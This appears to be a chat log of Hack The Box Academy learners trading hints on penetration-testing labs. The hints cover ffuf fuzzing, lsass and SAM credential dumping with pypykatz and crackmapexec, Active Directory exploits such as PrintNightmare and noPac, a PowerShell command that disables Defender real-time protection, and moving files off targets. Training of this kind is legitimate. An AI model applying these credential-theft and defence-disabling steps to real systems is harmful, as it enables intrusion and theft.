this is the ffuf command ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academya.htb:30130/ -H 'Host: FUZZ.academya.htb' , all the respond sizes are 986 so i tried to filter that with -fs 986 but nothing came out , am i doing something wrong ?

ATTACKING WEB APPLICATIONS WITH FFUF

Section filtering results

do you have more than 1 virtual machine powered on ?

@fierce pond try to grep the content-length

hi, does a highschool email qualify for the student subscription?

u mean Words ?

well i know for sure that admin subdomain is there but there's no difference between the results

they all have the same parameters

that's the problem

If u have the content-length u can use -fs to filter the correct one

well you are def talking about the size here , as i can see no other content-length there , and yes i am getting that as u can see from the pic , but there's no unique Content-Length , so the filter doesn't show any results at all

@fierce pond u can use curl to grep the size

yeah i can use curl or burb or even write a python code to get that length , but it wasn't working i just restart the machine and got the results

Ok

Anyone available for a DM on Attacking Common Services (Hard) Skill Assessment? I'm on the last step just having trouble executing it.

oh wait the original DNS was wrong i guess it redirect to academy.htb , but i didnt see any redirection in the nmap .

i thought i can name it whatever i want , which worked for one page , but u cant work it out to do subdomain search with it

thanks alot for the help tho , sometimes it just help to talk to someone to figure it out

no, I believe it is only university students. You can try, but they have a list of valid academic domains they use to check and I'm pretty sure it's only for college/university.

well if the highschool email is a gov or educational email domain then it might be allowed i guess

hence, why I said they have a list of valid academic domains...

thanks for the help

i found this on a help page somewhere "The Student Plan requires that you be a student of an Educational or Academic Institution. This includes High School/Secondary School, University, Trade School, etc. " so i'll try

I just purchased a yearly silver plan, that comes with an exam voucher. The problem is it gave me a bounty hunter exam voucher, wanted the other one. What do I do

Contact Support on the website

ok

im sure it gives you the option to "exchange" if you go to the dashboard

Anyone know why I am getting an error loop of “could not find stored procedure ‘EOF’” when attempting to run mssqlclient.exe with Evil-WinRM by chance? This is for question 3 on Active Directory enumeration & attacks “Privileged Access”

I’ve had similar issues with running mimikatz on Evil-WinRM. It would just loop a mimikatz prompt.

need to filter out the garbage output

-fs, -fw

using the correct hostname also helps

Hey all decided to ask this here because everyone is pretty informed in this channel and its pretty active. Is Footprinting also classified as active enumeration or just passive?

Hello

Can anyone help me with my open vpn ?

Thank you for the input. Unfortunately I received an error stating -fs and -fw are unrecognized arguments. Maybe I am inputting the flag in the wrong spot?

in ffuf ?

Mostly active

-fs 986

I ve a problem too xD

I attempted inputting host academy-ea-db01 but received the following…is this the incorrect hostname too?

dont think i was referring to your screenshot

moreso this one

Oh, yeah. Was not using ffuf. Using evil-winrm. Thank you though 🙂

no problem :)

Module name: Password Attacks

Section name: Attacking lsass

#Question: Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)

i stuck at this step

@wide river did u install the tool well

it already in my VB

@wide river try to provide it without the path

@wide river no like pypykatz lsa minidump lsass.dump

@wide river maybe use crackmapexec

@wide river no crackmapexec has an option which can dump lsass

@placid quest https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-lsass

Guys .Quick question. I downloaded the flag.txt on smbclient. Where the flag is stored ?

@wet jolt use locate

Didn't find 😦

I cannot complete the exercies without the flag xD

@wet jolt like locate flag.txt

i did both.

thanks for help btw

@wet jolt download the flag again

locate flag.txt
/var/lib/plocate/plocate.db: No such file or directory

i did it Ahhh bro

I'm felling dumb

cannot locate this damn flag

How about locate flag.*

smb: \flag> get flag.txt
getting file \flag\flag.txt of size 33 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \flag>

nope again my friend

Hi, I'm having an issue with the Footprinting Lab - Hard. Trying to ssh to the target but after changing permissions to 400 or 600, I still get the invalid format for my key file. I tried changing || the header and footer to RSA or OPENSSH PRIVATE KEY || but no success. Am I on the right or wrong path here?

Nevermind @placid quest i founded manually

Ty for help

Ok

@placid quest

@wide river -lsa

@wide river account privileges is not allowed to do that

hey,

i just made a htb account and I wanna try out but I got some problems can someone help?

@rustic sage yes

@wide river maybe try to reinstall pypykatz

so when I go full screen i can see linux for 2 sec and then the sites goes blanck

like it connecting and after a few seconds its disconnected

Hi all. I'm getting a TLS error when RDP on Windows Privesc: Windows Server section. Before I go trouble shooting is this normal? It's been fine on all the other boxes.

Oh even the attack box is giving me errors, so presumably a HTB issue.

xfreerdp gives tls errors if you use the wrong credentials if I remember correctly

I've been using Remmina and it's giving TLS errors before I even get password prompt.

the Linux icon in the file manager

Next box is absolutely fine too, so a specific issue with the Windows 2008 Server. Presumably something wrong in my settings.

Ack. So many people hate metasploit online!

Nah they dont hate it, they hate people using it

It's a weird one, I think it's helpful to use it as a beginner (especially me being a n00b)

metasploit is undeniably a powerful tool thats easy to use. Which leads to a lot of people knowing the basics of running it and thinking that makes them a 1337 hacker

So its a "if youre nothing without the tool you dont deserve the tool" situation

I'm still relying on it, mostly because I keep having to go over stuff.

Just saw some people online being pretty harsh on people using it

Whats a 1337 hacker?

leet speak for elite

(if I'm not wrong)

The hacker community is a pretty ecclectic sub-culture. Take opinions with a grain of salt.

Iknowiknowww

I've reached that brick wall right now. Just got onto SQL and its a lot of reading.

wait till you do the AD enumeration and attacks module

Did AD Enum

(horrific)

I was trying the lame box earlier but I can't get anything off it

I'm taking a day off so I don't burn out bleh

Take a break and refresh your mind. For lame make sure to enumerate everything and to read Exploit poc's.

If you do that the box will be ez dubs.

Also it is ok to use writeups and ippsecc😉

I'll keep it on board!

Anyone able to help me on Easy Nmap IDS/IPS

Need help with dns

DM

what about DNS?

Can I dm someone about chisel port forwarding?

Nope. Doesn't help that the remote machine keeps disconnecting too

Anyone around for a question with Nmap IDS/IPS med

ask away

how do we start w/ this discord? where are the problem sets to begin w/

hello are someone did thi one

• 0 Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)

in Tcpdump Fundamentals

Hey can anyone help me

I dont know how to submit root flag in my challenge

How do I decrypt tls_ECDHE_RSA_WITH_AES_128_GCM_SHA256 wireshark, I made my SSLKEYLOGFILE and it has keys, and I setup the file in wireshark, it decrypts http requests but it seems that wireshark has problems with ECDHE
however, fiddler does it perfectly fine, but I fiddler is strictly http

Or task

Hello I am in the Section Footprinting in the Pentester job role path I am stuck on 2 labs in the FTP section have tried everything and no luck.

Did you get your chisel problem fixed?

yep

Would anyone know how to to the FTP Footprinting lab I tried Nmap and other resources but no luck

did you figure this out?

Hey I have a question I am in the Penetration Tester and doing the first lab in Footprinting and the question
[3:39 PM]
Which version of the FTP server is running on the target system? Submit the entire banner as the answer.
[3:39 PM]
I am stuck on this

What have you tried?

I have tried nmap scan login with anonymous in the FTP server telnet nc and just about everything that is in the reading section before the lab

Can you be more specific? Like what commands have you run... feel free to DM.

ok

The only passwords I find are 'l#-x9r11_2_GL!' and '5erv3rAdmin!' but neither of them are the answer. Do I need to search for something other than "password" or "bob_adm"?

I would have to go back and find all that I did

I know I tried to script vuln in Nmap and tried to do anonymous entry into the FTP server

trying to find vuln in FTP port 21

Like using the -sV flag?

the reading material does not help to resolve the lab

yes

and -sC -Pn

Can you show me your output when you run with the -sV -sC -A flags?

tried version-all

let me see

maybe if I DM you I can share the screen shots

That's fine

fellas i'm completely FELLA

mygoaaad

No

I try to submit the root flag but it say wrong answer

sent you dm

Hi, did you manage to get this to work yet?

Anyone manage to get Q2 from Bleeding Edge Vulnerabilities section of AD.
It asks to get flag from DC01 as administrator, but the username in the question can't login, and both vulnerabilties seem to have issues. (printnightmare & petitotam)

Are you using scanner.py? If so, what's your syntax.

yeah 'noPac' does work just fine.
But I was more interested to test using printnightmare or PetitTotam. I was trying to replicate the exercise to see how the POC works.

I didn't test print or petit. The shell was screwy because you couldn't cd effectively.

yea CD doesn't work. you got to use Full paths

You could just add an admin and evil-winrm, or just snipe the flag and cat/type it. I had issues at first as well.

I can get the flag just fine. I was only interested in trying to replicate the printnightmare and petittotam exercises without issues

hello @everyone has someone completed the Local File Inclusion Module i am stuck on the skill assessment need help please 🤲

anyone on that has done the Web Service and API attacks skills assessment? currently stuck. need some hints or something

What part are you stuck on? If you are on the initial step, try to read the php source code using a method covered in the module.

hello friend can i please DM you ?

sure

hey did anyone here complete the windows command line module?

Hi, it's a good read about Web Application firewalls. https://blog.securelayer7.net/web-application-firewall/

anyone?

Greetings! Anyone got anny issues with the Attacking SAM exercises!

I can`t move the hives from the machine to my pawnbox :/ :/ I get access denied!

@rustic sage did u try with evil-winrm

not yet! I`m going to try that now!!

thanks for the hint! I will let you know!

No luck 😦 I get different errors...

in the section did you try the method under Creating a Share with smbserver.py? also i can't remember but if you got RDP then you can just use updog

i did shoot me a dm if you still need help with that

@vital adder I think u can use crackmapexec to dump sam database

what's the issue? also shoot me a dm if you still need help with that

yep... but first I need the 3 .saves files in my machine 😦

yep i think that's the second method i use for that section

I can`t transfer the files through the smbserver.py

what's the issue?

i didn't use that method for this but i don't see how it can't work for this

In the CMD of the machine gives me "Access denied" if I use xfreerdp and "The specified server cannot perform the requested operation" right after I type the move command

I have tried xfreerdp and evil-winrm

maybe it`s something in the smbserver command...

i'll give that method a try but you can just use updog

updog is a tool?!

yep https://github.com/sc0tfree/updog

||Password is an XML file||
I can't help you more than that 😅

Thanks man!! I will try it!

does anyone have a convenient way of making a users lists using kerbrute's userenum's output?

Not that it matters but i'm almost done with the CPTS pathway, what a ride it has been. Learned new stuff from every module, and i still have a long long way to go.

being l33t is no easy task

Im with updog but I cant find the shared folder...

so when you run updog the directory that you run it in is the share folder

I`m trying to download something from the machine...

and on your target machine go to your ip with port 9090 ( in a browser) and upload your file from there

ohhh oko k!

also i just give the example method a try and it seem to be working fine for me

Ohhh ok!!!

On the active directory module, the SSH creds on the DCSync chapter dont seem to work. Is someone familiar with this issue?

No luck for me with that one... I get the "the specified server cannot perform the requested operation"

I have it exactly the same as you...

wait wait!

Ipm going to copy the files to desktop like you

I have them in the C:|

@rustic sage provide the directory where u will save the file

no idea but i'm guessing you host the smb server a directory you don't have write permission?

wait.. Im going to try it with powershell...

also here is the updog method if you still need help with that you can just go to your ip on port 9090 and select the file you need and click upload (if something isn't working right just give the page a refresh)

same man...

I will try the updog now, I need a xfree session

just use updog or hell use crackmapexec like one of the last example

What is the use of updog?? Can someone explain?

just basically for uploading and downloading file

it's use the http simple server (python)

I see it's like a local webserver with GUI features

yes basically it is

Looks fire ngl

Does it have SSL and a custom DNS name feature?

no idea i don't need that for simple uploading file so i never use that but if it work with python http simple server it should work with updog

wait no it do 🤣

It has to or else it will be of no use to red teamers 😅

Im using updog now haha its taking a while but I guess its because the files are quite big

Works nicely 🙂 🙂 🙂 🙂 🙂

👍 Thanks!!!!!!!

This Windows Privesc Server 2008 box is not happy. :/

So painful.

Has anyone done this Module?

which module? the windows privilege escalation one?

Yes. The Windows Server section is just awful. Box can't connect via RDP. If I use the browser box it just disconnects constantly.

Every other box is fine for me. Just this specific Win 2008 Server.

What's worse is it's just a silly Metasploit autopwn flag, so it'll only take a moment.

oh year i did noted down target is so old there is no wget

for this you have to make a normal rev shell and on the target download it via browser and because there is no wget you can't use web_delivery for this

Yes brahh

I can't even get the RDP session stable.

but after you got a shell you should be able to use something like exploit suggester

i have no note about this but did you try remmina

Can't connect from local VM with xfreerdp or remmina. If I use a browser instance it takes a crap every few moments and needs to reconnect.

Yess iam trying

I think server is down

It's specific to this section, because I can relaunch any other box and it's fine.

if you have both the pwnbox and your vpn on that is the issue

both are trying to kick each other of the network so every few moments that happened

i'm in a module right now so i can't double check but try turn off both your vpn and the pwnbox after a bit only use one of them if the connection is a bit unstable i recommend using the pwnbox

Eh I can't get it to work at all locally through VM so just battle the attack box.

It was the last module left undone before I do the assessment

I don't solve it

Question on Attacking Common Applications Skills Assessment Question 4. I solved it and got the flag (with the help of previous questions asked). My question is how were we meant to know that the particular |servlet| was accessible? If you access the page, it 404s so it doesn't show up when you use something like gobuster.

Hello. I am having issues with the getting started module.

In the public exploits section i cant connect to the target machine

I am using the provided Pwnbox

Nvm it is working now

skills

Oh the skills assessments were easy for the Windows Priv Esc module. :-s

Was expecting it to be hard given all I've learned haha

has anyone done RDP and SOCKS Tunneling with SocksOverRDP within Pivoting, Tunneling, and Port Forwarding, and had issues with Windows deleting the .dll files?

L anyone experienced with Windows? It looks like all Firewalls and Defender are disabled and I executed Set-MpPreference -DisableRealtimeMonitoring $true, but Windows is still removing the .dll🫠

It's a shame there's no evasion / obfuscation module.

some of the modules have sections about it, but they really don't teach you anything. It's more theory / you "CAN" do this, but you need to do the outside research. Which I have in most cases.

I just don't know why it's enabled for this lab if up to this point (and I've been doing CPTS in order) there has been nothing about getting around this besides Set-MpPreference -DisableRealtimeMonitoring $true.

THM have a bunch of modules on EDR evasion / obfuscation etc. I've no idea if they're any good but I'm thinking of a 1 month sub just to do them all at some point.

I feel like a solid evasion module would be a worthy addition to their PNPT course.

Hey everyone, I am new in the cyber security field. Can anyone suggest where to start? Thank you

HTB Academy

What's that? How can I start my career in the field

most definitely, the HTB team has been putting in a lot of work for new modules so maybe there is one on the horizon

Start with networking.

https://academy.hackthebox.com/

Ok, thank you for the link

Yashar: thank you

🖤

I'll check out the website. Any certificate that u can suggest for an entry level roles

Do you guys have LinkedIn?

Network +

Perfect

What are you currently working on? Yashar

Programming & Social Engineering

Nice

I finished my bachelor degree in computer engineering and working towards a master in cyber security

Anyone got any idea why I might be having issues on the question for Operating System Structure under the Windows Fundamentals module? I have tried both the dir command and the tree command in both MATE terminal and powershell and it keeps saying that there is no C drive

real time protection for that machine is on you have to disable it by hand in windows security

also if the AV delete the dll file and you get that same file back after disable the AV that file is unusable\

give both of these video a check if you are new to this
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

so what command did you run and what's the issue?

HackThebox is a great place to start. Let me know if you have any questions.

😁

First thing I tried was dir c:\ /a and then I tried tree c:\ /f | more and both times I got a response saying there was no directory or no c drive

They really need to add this. 🤷🏻‍♂️

i got the same dir command in my note so if that doesn't try restart the target machine or something

I dunno why me here and 😂 what du I do

Any one gimme some

Info

?

also the more command in cmd is for reading file so i don't think you can use the more command like that

Huh?

#welcome

Ok so stick with powershell for this command?

Thank

nope just use cmd for this

I can't find cmd on the target, is that the MATE terminal?

wait what? it's a windows target isn't it?

Yes

then how can it don't have a cmd??

I'm not sure, I may just be missing it but on the target and can't find cmd anywhere

Got this as a copypasta definitely hahah

If you give me a bit, Andy, I can check it out, I did that module.

i didn't do all of the evasion room on THM but a lot of them dive into C code stuff and i know nothing about that so not sure if i can even do all of them

Appears I made the same mistake as last time and have not learned I need to go to full screen, thank you for the help

oh yeah that's a thing now but for this you don't have to

I think for obfuscation it'll be important but you can bypass some older stuff just by removing all the comments in a piece of code before you compile it

only some of the room give you c code that you can compile and use on the target also right now i'm now sure but i think a big chunk of the room only give you like example code and you have to make some custom code for the actual target

all i can do is bash and some python so 😢

Does Set-MpPreference -DisableRealtimeMonitoring $true not disable it?

nope

Indicates whether to use real-time protection. If you specify a value of $False or do not specify a value, Windows Defender uses real-time protection. We recommend that you enable Windows Defender to use real-time protection.🤔

is that from the section?

That is from Window's documentation lol

@vital adder https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps#-disablerealtimemonitoring

gotta love Windows I guess... then again I have RDP so I probably should've confirmed it was off I just assumed the command worked as documented🤷‍♂️

ohhh you mean the command yeah that command usually work on most machine for my but not this for some reason

if tamper protection is on then that command will 100% not work but i don't think it is in this case

hello

hi